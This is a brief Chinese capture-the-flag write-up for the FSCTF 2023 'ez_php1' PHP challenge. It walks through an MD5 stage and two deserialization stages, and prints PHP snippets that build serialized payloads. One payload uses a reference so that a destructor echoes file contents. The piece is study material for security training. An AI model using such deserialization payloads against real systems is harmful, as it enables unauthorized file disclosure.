[FSCTF 2023]ez_php1

爆农2024-05-14 13:33

一共有三小关

第一关:md5加密

第二关:反序列化

重点 单个字符串序列化 unserialize($str) === "$KEY"

php 复制代码 
<?php
$KEY="YES I love";

echo serialize($KEY);

s:10:"YES I love";

第三关: 反序列化

把a的地址赋给b,因为在__destruct()中有echo,可以输出文件内容。

php 复制代码 
$c=new Clazz();
$c->b=&$c->a;
echo serialize($c);
相关推荐
xixixi777771 天前
STIX/TAXII:网络威胁情报的“普通话”与“顺丰快递”
开发语言·安全·php·威胁·攻击检测·stix·taxii
前进的李工1 天前
零知识证明:不泄露秘密也能自证
人工智能·web安全·区块链·零知识证明
Bruce_Liuxiaowei1 天前
全面TCP端口扫描:Nmap高级扫描技术与实战应用
网络·tcp/ip·网络安全·php
emma羊羊1 天前
【Yakit渗透利器】
安全·web安全
catchadmin1 天前
PHP 8.6 新增 clamp() 函数
开发语言·php
隔壁小白1 天前
PHP 8.1 枚举(Enums)详解
php
Bug.ink1 天前
BUUCTF——WEB(3)
web安全·网络安全·buuctf
郑州光合科技余经理1 天前
海外国际版同城服务系统开发:PHP技术栈
java·大数据·开发语言·前端·人工智能·架构·php
一杯咖啡的时间1 天前
2021年与2025年OWASP Top 10
网络·安全·web安全
墨痕诉清风1 天前
java漏洞集合工具(Struts2、Fastjson、Weblogic(xml)、Shiro、Log4j、Jboss、SpringCloud)
xml·java·struts·安全·web安全·spring cloud·log4j
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03Linux下V2Ray安装配置指南04BongoCat - 跨平台键盘猫动画工具05在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)06安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)07jdk21下载、安装(Windows、Linux、macOS)08sqli-labs靶场通关笔记:第18-19关 HTTP头部注入09Open-AutoGLM Windows 安装部署教程10RedissonClient的配置解析